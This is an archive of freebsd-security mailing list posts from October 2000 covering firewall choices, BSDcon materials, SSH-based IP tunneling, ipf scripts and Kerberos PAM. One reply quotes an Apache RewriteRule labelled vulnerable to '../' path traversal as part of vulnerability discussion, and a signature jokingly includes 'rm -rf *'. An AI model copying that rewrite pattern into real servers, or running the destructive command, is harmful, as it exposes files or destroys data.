I won't be able to attend the BSDcon since I'll be at SANS all day all week, but I would like to get some of the papers and/or presentation materials (slides, handout notes, etc.), especially security related ones. I have already checked the www.bsdcon.com site and could not find any information on this (unless the website added it recently). Does one need to track down individual presenters? -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 13:48: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id 5EC0937B502 for ; Sun, 8 Oct 2000 13:47:54 -0700 (PDT) Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id QAA46323; Sun, 8 Oct 2000 16:47:52 -0400 (EDT) Date: Sun, 8 Oct 2000 16:47:52 -0400 (EDT) From: To: "Crist J . Clark" Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 In-Reply-To: <20001008131125.V25121@149.211.6.64.reflexcom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 8 Oct 2000, Crist J . Clark wrote: > Where will papers or presentation materials be published? I won't be > able to attend the BSDcon since I'll be at SANS all day all week, but > I would like to get some of the papers and/or presentation materials > (slides, handout notes, etc.), especially security related ones. I > have already checked the www.bsdcon.com site and could not find any > information on this (unless the website added it recently). Does one > need to track down individual presenters? No I do not believe so. Last year all the papers or I believe all were put on the bsdcon's website. So I believe they will be this year as well. 
Which is really nice for those who could not attend ============================================================================= -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas Home: scanner@deceptively.shady.org | http://open-systems.net ============================================================================= WINDOWS: "Where do you want to go today?" LINUX: "Where do you want to go tommorow?" BSD: "Are you guys coming or what?" ============================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 14: 1:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 6257537B503 for ; Sun, 8 Oct 2000 14:01:43 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id PAA01849; Sun, 8 Oct 2000 15:01:34 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id PAA15915; Sun, 8 Oct 2000 15:01:33 -0600 (MDT) (envelope-from nate) Date: Sun, 8 Oct 2000 15:01:33 -0600 (MDT) Message-Id: <200010082101.PAA15915@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Darren Reed Cc: craig@allmaui.com (Craig Cowen), freebsd-security@FreeBSD.ORG (freebsd-security@FreeBSD.ORG) Subject: Re: Check Point FW-1 In-Reply-To: <200010070747.SAA26913@cairo.anu.edu.au> References: <39DEBB51.E51BACFB@allmaui.com> <200010070747.SAA26913@cairo.anu.edu.au> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > The big 
cheeses at work want to use check point instead of ipf or any > > other open source solution. > > Can anybody help me with vunerabilities to this so that I can change > > thier minds? > > Tell them that IP Filter is the software which protects Firewall-1 from > the Internet when running on Solaris - you have to go with naked FW-1 on > NT. There are two factors to this equation, however. FW-1 is typically > deployed on Solaris/NT machines although now the Nokia box makes up a > large number of those sales. The Nokia boxes run IPSO which was, long > ago, FreeBSD (I'm told it no longer bears much resemblence). Not completely true. I've heard rumors that underneath it's still pretty much FreeBSD, and they may be updating the packeage to FreBSD 4.1R 'Real Soon Now'. The biggest fator seems to be the silly license scheme that CheckPoint uses for 'porting' to other platforms. Nate - Not officially associated with the group @ Nokia that builds the boxes, although I have met a few of them as they are in the same building as my group at Nokia. 
:) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 14: 9: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 5216837B503 for ; Sun, 8 Oct 2000 14:09:04 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id B3A8F1C6B; Sun, 8 Oct 2000 17:08:51 -0400 (EDT) Date: Sun, 8 Oct 2000 17:08:51 -0400 From: Bill Fumerola To: cjclark@alum.mit.edu Cc: Wes Peters , Gregory Sutter , Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 Message-ID: <20001008170851.A38472@jade.chc-chimes.com> References: <39DEBB51.E51BACFB@allmaui.com> <20001006230628.L23587@klapaucius.zer0.org> <39E010FE.8CAA2CB1@softweyr.com> <20001008034330.X38472@jade.chc-chimes.com> <39E0A273.E2243C9A@softweyr.com> <20001008131125.V25121@149.211.6.64.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001008131125.V25121@149.211.6.64.reflexcom.com>; from cjclark@reflexnet.net on Sun, Oct 08, 2000 at 01:11:25PM -0700 X-Operating-System: FreeBSD 3.3-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 08, 2000 at 01:11:25PM -0700, Crist J . Clark wrote: > > Sorry, Bill, I should've mentioned your talk and Guido's. I presented mine as > > a refutation of the orinal writer's "the bosses want to go with a commercial > > solution". This is going to be a great Con, and surprise surprise security is > > THE hot topic this year. > > That seems somewhat funny since SANS is having a confrence in Monterey > at the same time. > > Where will papers or presentation materials be published? 
I won't be > able to attend the BSDcon since I'll be at SANS all day all week, but > I would like to get some of the papers and/or presentation materials > (slides, handout notes, etc.), especially security related ones. I > have already checked the www.bsdcon.com site and could not find any > information on this (unless the website added it recently). Does one > need to track down individual presenters? Not speaking for the other presenters but I'll have all materials used in the talk available in people.freebsd.org/~billf/ somewhere. I'd make them available now, but I haven't written them yet. -- Bill Fumerola - Network Architect, BOFH / Chimes, Inc. billf@chimesnet.com / billf@FreeBSD.org PS. Unless you're Jim Mock, in which case they're all done and I'm all ready. No worries. :-> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 15:45:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id EA41137B502 for ; Sun, 8 Oct 2000 15:45:15 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13iPMJ-0001RE-00; Sun, 08 Oct 2000 16:55:55 -0600 Message-ID: <39E0FB7B.E01EA57A@softweyr.com> Date: Sun, 08 Oct 2000 16:55:55 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: cjclark@alum.mit.edu Cc: "Jeffrey J. 
Mountin" , David Talkington , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 References: <200010080427.PAA19412@cairo.anu.edu.au> <4.3.2.20001008070308.00b9ae90@207.227.119.2> <20001008130301.U25121@149.211.6.64.reflexcom.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Crist J . Clark" wrote: > > On Sun, Oct 08, 2000 at 07:13:17AM -0500, Jeffrey J. Mountin wrote: > > [snip] > > > Another reason why they may not wish to go with "in-house" talent is the > > idea to out source. Companies do this so they don't have to pay for a > > full-time employee or reallocate internal resources for projects. In some > > cases it is worthwhile. Other times it's an endless black hole. Can only > > blame the suits for taking this idea too far at times. > > Another reason, and this is not necessarily the management's fault, is > the lack of qualified people available. At least this is the case in > many, if not most, parts of the US. There are a lot of qualified > people who are only interested in doing contract work. If you have the > choice of hiring, (a) no one, (b) a not-qualified full time person, or > (c) a qualified contract person, for a job that needs to be done NOW, > what choice does management really have? The same one they always choose, (d) yank some secretary or janitor in, tell them it is now their job to "make the computers secure", and threaten to fire them if it isn't done yesterday at no cost. This is the main reason the internet is such a happy hunting ground for script kiddies. -- "Where am I, and what am I doing in this handbasket?" 
Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 15:47:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 1CE1037B502 for ; Sun, 8 Oct 2000 15:47:37 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13iPO3-0001RG-00; Sun, 08 Oct 2000 16:57:43 -0600 Message-ID: <39E0FBE7.31112DF5@softweyr.com> Date: Sun, 08 Oct 2000 16:57:43 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: cjclark@alum.mit.edu Cc: Bill Fumerola , Gregory Sutter , Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 References: <39DEBB51.E51BACFB@allmaui.com> <20001006230628.L23587@klapaucius.zer0.org> <39E010FE.8CAA2CB1@softweyr.com> <20001008034330.X38472@jade.chc-chimes.com> <39E0A273.E2243C9A@softweyr.com> <20001008131125.V25121@149.211.6.64.reflexcom.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Crist J . Clark" wrote: > > On Sun, Oct 08, 2000 at 10:36:03AM -0600, Wes Peters wrote: > > Bill Fumerola wrote: > > > > > > On Sun, Oct 08, 2000 at 12:15:26AM -0600, Wes Peters wrote: > > > > > > > Others have mentioned a couple of commercial alternatives; add NetMax and > > > > GnatBox (right?) to this list. Also, be sure to get a copy of my paper > > > > for BSDCon explaining why my company decided to use BSD and ipfilter to > > > > build the firewall of the future on. (Sorry, it's not a corporate firewall > > > > and is not suited for your use.) 
> > > > > > As long as Wes is plugging his talk, mine will be talking about ipfw and stopping > > > attacks and such. Guido van Rooij is also giving an ipfilter talk I'm looking > > > forward to attending. Firewalls are well represented at this years BSDcon. > > > > Sorry, Bill, I should've mentioned your talk and Guido's. I presented mine as > > a refutation of the orinal writer's "the bosses want to go with a commercial > > solution". This is going to be a great Con, and surprise surprise security is > > THE hot topic this year. > > That seems somewhat funny since SANS is having a confrence in Monterey > at the same time. > > Where will papers or presentation materials be published? I won't be > able to attend the BSDcon since I'll be at SANS all day all week, but > I would like to get some of the papers and/or presentation materials > (slides, handout notes, etc.), especially security related ones. I > have already checked the www.bsdcon.com site and could not find any > information on this (unless the website added it recently). Does one > need to track down individual presenters? I assume the conference proceedings will be available after the conference. Feel free to come over and hang around for dinner, too. Maybe we should see if we can setup an informal meeting for BSD'ers attending the SANS conference one night. -- "Where am I, and what am I doing in this handbasket?" 
Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 16: 0:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from hand.dotat.at (hand.dotat.at [212.240.134.135]) by hub.freebsd.org (Postfix) with ESMTP id 97B2337B66C for ; Sun, 8 Oct 2000 16:00:32 -0700 (PDT) Received: from fanf by hand.dotat.at with local (Exim 3.15 #3) id 13iPPE-000ISM-00; Sun, 08 Oct 2000 22:58:56 +0000 Date: Sun, 8 Oct 2000 22:58:55 +0000 From: Tony Finch To: "Andrey A. Chernov" Cc: security@freebsd.org Subject: Re: A new problem in apache ? Message-ID: <20001008225855.E12691@hand.dotat.at> References: <200010010102.VAA41966@giganda.komkon.org> <20001001053035.A26403@nagual.pp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20001001053035.A26403@nagual.pp.ru> Organization: Covalent Technologies, Inc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Andrey A. Chernov" wrote: > >> Here are some example RewriteRule directives. The first is vulnerable, but the others are not >> >> RewriteRule /test/(.*) /usr/local/data/test-stuff/$1 > >Looks like famous ../../../ trick can be used. Yes, but you have to be reasonably cunning to get a ../../../.. into the path whilst avoiding the checks for it. I've posted more information about this problem to bugtraq. Tony. -- en oeccget g mtcaa f.a.n.finch v spdlkishrhtewe y dot@dotat.at eatp o v eiti i d. 
fanf@covalent.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 16: 3:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id B891F37B66C for ; Sun, 8 Oct 2000 16:03:13 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13iPTI-0004u0-00; Mon, 09 Oct 2000 01:03:08 +0200 Date: Mon, 9 Oct 2000 01:03:08 +0200 (IST) From: Roman Shterenzon To: cjclark@alum.mit.edu Cc: freebsd-security@freebsd.org Subject: Re: Check Point FW-1 In-Reply-To: <20001008125715.T25121@149.211.6.64.reflexcom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 8 Oct 2000, Crist J . Clark wrote: > On Sat, Oct 07, 2000 at 01:33:04PM -0400, Brian Reichert wrote: > > On Fri, Oct 06, 2000 at 10:57:37PM -0700, Craig Cowen wrote: > > > The big cheeses at work want to use check point instead of ipf or any > > > other open source solution. > > > Can anybody help me with vunerabilities to this so that I can change > > > thier minds? > > > > I found that Checkpoint 4.0 (this may have changed) doesn't do NAT > > right; it uses NAT across _all_ interfaces, instead of letting you > > pick one. > > Right, it determines whether to do NAT by source address, destination > address, and destination port. Actually, it is not possible to do > _anything_ per interface from the GUI. Wouldn't it be nice (and > wouldn't you expect a firewall to be able) to block anything not > destined for a small block of registered IPs at the external > interface? Well, you can't put a rule to do that in the GUI. That's rule 0 - it does antispoofing stuff. It's really simple. From the GUI. Now, does it have anything to do with FreeBSD-security? 
--Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 22:51:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id BDCE337B503; Sun, 8 Oct 2000 22:51:30 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 8 Oct 2000 22:50:11 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e995pPu86287; Sun, 8 Oct 2000 22:51:25 -0700 (PDT) (envelope-from cjc) Date: Sun, 8 Oct 2000 22:51:25 -0700 From: "Crist J . Clark" To: Roman Shterenzon Cc: cjclark@alum.mit.edu, freebsd-chat@freebsd.org Subject: Re: Check Point FW-1 Message-ID: <20001008225125.A25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <20001008125715.T25121@149.211.6.64.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from roman@xpert.com on Mon, Oct 09, 2000 at 01:03:08AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 09, 2000 at 01:03:08AM +0200, Roman Shterenzon wrote: > On Sun, 8 Oct 2000, Crist J . Clark wrote: > > > On Sat, Oct 07, 2000 at 01:33:04PM -0400, Brian Reichert wrote: > > > On Fri, Oct 06, 2000 at 10:57:37PM -0700, Craig Cowen wrote: > > > > The big cheeses at work want to use check point instead of ipf or any > > > > other open source solution. > > > > Can anybody help me with vunerabilities to this so that I can change > > > > thier minds? 
> > > > > > I found that Checkpoint 4.0 (this may have changed) doesn't do NAT > > > right; it uses NAT across _all_ interfaces, instead of letting you > > > pick one. > > > > Right, it determines whether to do NAT by source address, destination > > address, and destination port. Actually, it is not possible to do > > _anything_ per interface from the GUI. Wouldn't it be nice (and > > wouldn't you expect a firewall to be able) to block anything not > > destined for a small block of registered IPs at the external > > interface? Well, you can't put a rule to do that in the GUI. > > That's rule 0 - it does antispoofing stuff. > It's really simple. From the GUI. It's only simple if you have only a LAN behind the box. If you've got multiple, non-adjacent logical netblocks routed behind the box, it is non-trivial to setup the "built-in" antispoofing. > Now, does it have anything to do with FreeBSD-security? Not much anymore, redirected to -chat if anyone still cares. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 23: 0: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from femail2.sdc1.sfba.home.com (femail2.sdc1.sfba.home.com [24.0.95.82]) by hub.freebsd.org (Postfix) with ESMTP id 6EAA537B503 for ; Sun, 8 Oct 2000 23:00:05 -0700 (PDT) Received: from mike.home.net ([24.7.95.143]) by femail2.sdc1.sfba.home.com (InterMail vM.4.01.03.00 201-229-121) with ESMTP id <20001009055955.IRQY27630.femail2.sdc1.sfba.home.com@mike.home.net> for ; Sun, 8 Oct 2000 22:59:55 -0700 Message-Id: <4.3.2.7.2.20001008220611.085d2f00@mail.atomz.com> X-Sender: mpthompson@mail.smateo1.sfba.home.com X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sun, 08 Oct 2000 22:56:48 -0700 To: freebsd-security@freebsd.org From: Mike Thompson Subject: Encrypted IP tunneling solution Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; 
format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've created a fairly simple little application called stun that essentially combines the functionality of nos-tun with SSH. Stun does for IP tunneling what sftp does for FTP -- it makes it trivial to set up the highly secure tunneling of raw IP packets between any two FreeBSD systems that have SSH and tunneling devices (/dev/tunXX) enabled. Although similar functionality can be had with binding a PPP socket to SSH or setting up IPSEC, I found that neither of these solutions were very easy to implement correctly. I wanted something that would bit simpler for someone with limited Unix admin skills to get working in a reliable manner. My purpose behind this email is to gauge the interest this little application. I currently have it implemented at the experimental stage right now where it seems to work well, but it has not been extensively tested. Unfortunately my time is very limited to work on this, but if there is sufficient interest I would be glad to help someone else evolve it to the point where it is proven to work well and can be contributed to the FreeBSD ports collection. If you are interested, let me know. I'm more than happy to share it, but I guess I'll have to slap a BSD style copyright on the source code first :-). Also, if you know of a similar application already in existence, please let me know so I don't waste my time. BTW, my ultimate goal behind this little application is to get it working with Windows clients running SSH protocols where it can serve as a very simple, but secure VPN solution. As one might expect, it has proven to be much easier to write the FreeBSD/Unix side of things than the Windows side where a virtual NDIS VxD driver or some similar beast will have to be implemented. 
Mike Thompson mike@atomz.com CTO/Co-Founder Atomz.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 23: 9:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail-green.research.att.com (H-135-207-30-103.research.att.com [135.207.30.103]) by hub.freebsd.org (Postfix) with ESMTP id 5FE6B37B502; Sun, 8 Oct 2000 23:09:13 -0700 (PDT) Received: from alliance.research.att.com (alliance.research.att.com [135.207.26.26]) by mail-green.research.att.com (Postfix) with ESMTP id 14C561E054; Mon, 9 Oct 2000 02:09:00 -0400 (EDT) Received: from windsor.research.att.com (windsor.research.att.com [135.207.26.46]) by alliance.research.att.com (8.8.7/8.8.7) with ESMTP id CAA00325; Mon, 9 Oct 2000 02:08:59 -0400 (EDT) From: Bill Fenner Received: (from fenner@localhost) by windsor.research.att.com (8.8.8+Sun/8.8.5) id XAA13132; Sun, 8 Oct 2000 23:08:58 -0700 (PDT) Message-Id: <200010090608.XAA13132@windsor.research.att.com> MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII To: eivind@yes.no Subject: Re: Stable branch Cc: freebsd-security@freebsd.org, cvs-committers@freebsd.org References: <4.3.2.20001007214506.00bb7c10@207.227.119.2> <20001008131908.B78013@warning.follo.net> Date: Sun, 8 Oct 2000 23:08:57 -0700 Versions: dmail (solaris) 2.2g/makemail 2.9a Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Warner's technique of adding the branch tag for only those files we actually >modify would negate the 30-byte cost, but I don't think it is worthwhile. >If we want to negate that cost, it'd be better to mod CVS to be able to >easily reference the base of a branch tag (as the branch point tag is done >to get around problems in the CVS user interface.) A front end to add the branch point tag after the fact is be pretty trivial. 
I just wrote freefall:~fenner/bin/tagbp as a proof of concept; it could obviously use a little more error checking, but it gets the revision right on everything I tried it on.

  Bill

From owner-freebsd-security Mon Oct 9 02:10:44 2000
From: Dimitar Peikov
Organization: Rila Solutions
Date: Mon, 9 Oct 2000 12:02:54 +0300
To: Freebsd-security@FreeBSD.ORG
Subject: Kerberos and pam_xxx.so

I've just installed 4.1-RELEASE and tried to configure Kerberos5 (Heimdal). All went ok, but the PAM library that must allow Kerberos authentication was not available, or I can't find it. I tried to compile it from the crypto sources but got some errors when generating Makefiles. I could compile and install kerberos5 from the MIT.EDU sources, but find this unreasonable.

Any comments on this would be helpful!
-- 
Dimitar Peikov
Programmer

From owner-freebsd-security Mon Oct 9 07:48:39 2000
From: "Cameron, Frank"
Date: Mon, 9 Oct 2000 10:49:48 -0400
To: freebsd-security@FreeBSD.ORG
Cc: "'Mike Thompson'"
Subject: RE: Encrypted IP tunneling solution

>From: Mike Thompson [mailto:mpthompson@home.net]
>Subject: Encrypted IP tunneling solution
>
>I've created a fairly simple little application called stun that
>essentially combines the functionality of nos-tun with SSH.
>
>Also, if you know of a similar application already in existence,
>please let me know so I don't waste my time.

This sounds somewhat similar to VTun; vtun.sourceforge.net.
-frank

From owner-freebsd-security Mon Oct 9 07:54:19 2000
From: Ron 'The InSaNe One' Rosson
Date: Mon, 9 Oct 2000 07:54:14 -0700
To: freebsd-security@freebsd.org
Subject: Re: Encrypted IP tunneling solution

Cameron, Frank (cameron@ctc.com) wrote:
> >From: Mike Thompson [mailto:mpthompson@home.net]
> >Subject: Encrypted IP tunneling solution
> >
> >I've created a fairly simple little application called stun that
> >essentially combines the functionality of nos-tun with SSH.
> >
> >Also, if you know of a similar application already in existence,
> >please let me know so I don't waste my time.
>
> This sounds somewhat similar to VTun; vtun.sourceforge.net.
>

Either way I wouldn't mind seeing either one in the ports tree ;-)

-- 
------------------------------------------------------------------------------
Ron Rosson                                  ... and a UNIX user said ...
The InSaNe One                                        rm -rf *
insane@oneinsane.net                        and all was /dev/null and *void()
------------------------------------------------------------------------------
All things considered, insanity may be the only reasonable alternative.

From owner-freebsd-security Mon Oct 9 08:02:04 2000
From: Peter Pentchev
Date: Mon, 9 Oct 2000 18:01:51 +0300
To: Ron 'The InSaNe One' Rosson
Cc: freebsd-security@freebsd.org
Subject: Re: Encrypted IP tunneling solution

On Mon, Oct 09, 2000 at 07:54:14AM -0700, Ron 'The InSaNe One' Rosson wrote:
> Cameron, Frank (cameron@ctc.com) wrote:
> > >From: Mike Thompson [mailto:mpthompson@home.net]
> > >Subject: Encrypted IP tunneling solution
> > >
> > >I've created a fairly simple little application called stun that
> > >essentially combines the functionality of nos-tun with SSH.
> > >
> > >Also, if you know of a similar application already in existence,
> > >please let me know so I don't waste my time.
> >
> > This sounds somewhat similar to VTun; vtun.sourceforge.net.
>
> Either way I wouldn't mind seeing either one in the ports tree ;-)

There already is a net/vtun port :)

G'luck,
Peter

-- 
Do you think anybody has ever had *precisely this thought* before?

From owner-freebsd-security Mon Oct 9 09:23:21 2000
From: Brett Glass
Date: Mon, 09 Oct 2000 10:22:59 -0600
To: Mike Thompson, freebsd-security@FreeBSD.ORG
Subject: Re: Encrypted IP tunneling solution

At 11:56 PM 10/8/2000, Mike Thompson wrote:
>BTW, my ultimate goal behind this little application is to get it working
>with Windows clients running SSH protocols where it can serve as a very
>simple, but secure VPN solution.

This would be the real value. It would be VERY useful to tunnel Windows clients with minimal effort. It'd be even nicer if it were stand-alone; that is, if it did not require a separate SSH implementation to be installed on the Windows machine. Many of the users who one wants to tunnel into a LAN remotely do not have shell accounts, and giving them such accounts can compromise security and/or be confusing to them.
Using SSH 2 (which doesn't require a shell account for port redirection) would be a good way to do this.

--Brett Glass

From owner-freebsd-security Mon Oct 9 10:18:13 2000
From: horio shoichi
Organization: pointer software
Date: Tue, 10 Oct 2000 02:17:08 +0900
To: "freebsd-security@FreeBSD.ORG"
Subject: Re: Default Deny

Gerhard Sittig wrote:
>
> > > I use this to reload my settings after changes
> > >
> > > #!/bin/sh
> > > ipf -D
> > > ipf -Fa -f /etc/ipf.conf -E
> > > ipnat -CF -f /etc/ipnat.conf
>
> I would prefer something like
>
> ipf -I -Fa -f /etc/ipf.conf -v
> ( ipf -s; sleep 60; ipf -s; ) &
> # heavy testing until the prompt returns
> ipf -s # only when you're happy with what the test showed
>

Here is my preference.
ipf -IFa -If ./ipf.rules >errors 2>&1
cat errors
test ! -s errors && { rm errors ; ipf -s ; }

horio shoichi

From owner-freebsd-security Mon Oct 9 11:00:14 2000
From: John F Cuzzola
Date: Mon, 9 Oct 2000 11:00:12 -0700 (PDT)
To: freebsd-security@FreeBSD.ORG
Subject: FreeBSD tun device

Hello everyone,
I'm setting up VPNs using the pipsecd port. I know I probably should be using KAME/racoon, but pipsecd is easy to set up and the same software works with Linux boxes, again making things easier. My question is: since pipsecd requires the tun device, is there a limit to the number of tunnel devices FreeBSD will handle? I recall one day someone having a problem with more than 9 tunnel devices and I thought I would ask.

Thank-you,

John C.
From owner-freebsd-security Mon Oct 9 12:05:58 2000
From: "Jonathan M. Slivko"
Date: Mon, 9 Oct 2000 13:01:36 +0000 (GMT)
To: Craig Cowen
Cc: David Talkington, "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1

What about LinuxCare and RedHat Support? Isn't that pretty much the same thing as what you're referring to when you say "1-800-helpIseebluescreens"? That's essentially the same thing. Isn't it?

---------------------------------------------
Jonathan M. Slivko
Sys. Admin, Linux Mafia Internet Services
Tech. Support, Simple Hosting Solutions
"FreeBSD -- The Power To Serve!"
---------------------------------------------

On Sun, 8 Oct 2000, Craig Cowen wrote:

> Well I sure have stirred up a topic.
> Unfortunately, whoever made the point of covering their (the suits') asses
> by means of accountability hit the nail on the head.
> That and not being dependent on me. But I argue on that point that there
> are many out there who could utilize IPF.
> More important, if the person who will be administering FW-1 can't, then
> he/she doesn't know enough about the practice.
>
> Opinions, like assholes (and this list proves what I am about to say),
> everybody has one.
> Here is mine.
> NT has no reason on this planet except for people who want to reboot their
> workstation once a week instead of once a day.
> As a matter of fact, given the choice between an NT box and a Mac, I would
> go back to bussing tables.
> Unix is where it is at, Solaris, BSD, Linux, whatever, there is no equal
> and there never will be.
>
> As for 1-800-helpmeIseebluescreens, they are dumber than the people who
> choose to purchase the product in the first place and have only cheat
> sheets created by the engineers who know what will fail because the Suits
> above them had to rush their overpriced product to market so that they
> could go IPO and not under.
>
> Just my Opinion/Rant/Frustration
>
> Craig
>
> David Talkington wrote:
>
> > >What is really the difference is being able to dial 1-800-FIREWALL and
> > >have someone help you out, etc.
> > >Darren
> >
> > Yeah, I wonder if my (item b) instinct was unfair. David Pick
> > mentioned herein the possibility that the company might not even WANT
> > the expertise to be in-house, and while his scenario was pretty ugly,
> > it suggests a more benign one ... if the company goes with an
> > open-source solution, and you're the only one on staff who knows how
> > to use it, they are then dependent on your talent. Great for you, but
> > bad for them, if turnover is high. At least a purchased solution
> > ensures some kind of support no matter who leaves the company.
> >
> > Your thoughts on this? Seems like a valid concern, and not one that I
> > had considered. (Perhaps I'm naive ... )
> >
> > - -d
> >
> > - --
> > David Talkington
> > Prairienet / Community Networking Initiative
> > 217-244-1962
> > dtalk@prairienet.org
> >
> > PGP Key: http://www.prairienet.org/~dtalk/dt000823.asc

From owner-freebsd-security Mon Oct 9 14:48:44 2000
From: Kris Kennaway
Date: Mon, 9 Oct 2000 14:49:04 -0700
To: Dimitar Peikov
Cc: Freebsd-security@FreeBSD.ORG
Subject: Re: Kerberos and pam_xxx.so
On Mon, Oct 09, 2000 at 12:02:54PM +0300, Dimitar Peikov wrote:
> I've just installed 4.1-RELEASE and tried to configure Kerberos5
> (Heimdal). All went ok, but the PAM library that must allow Kerberos
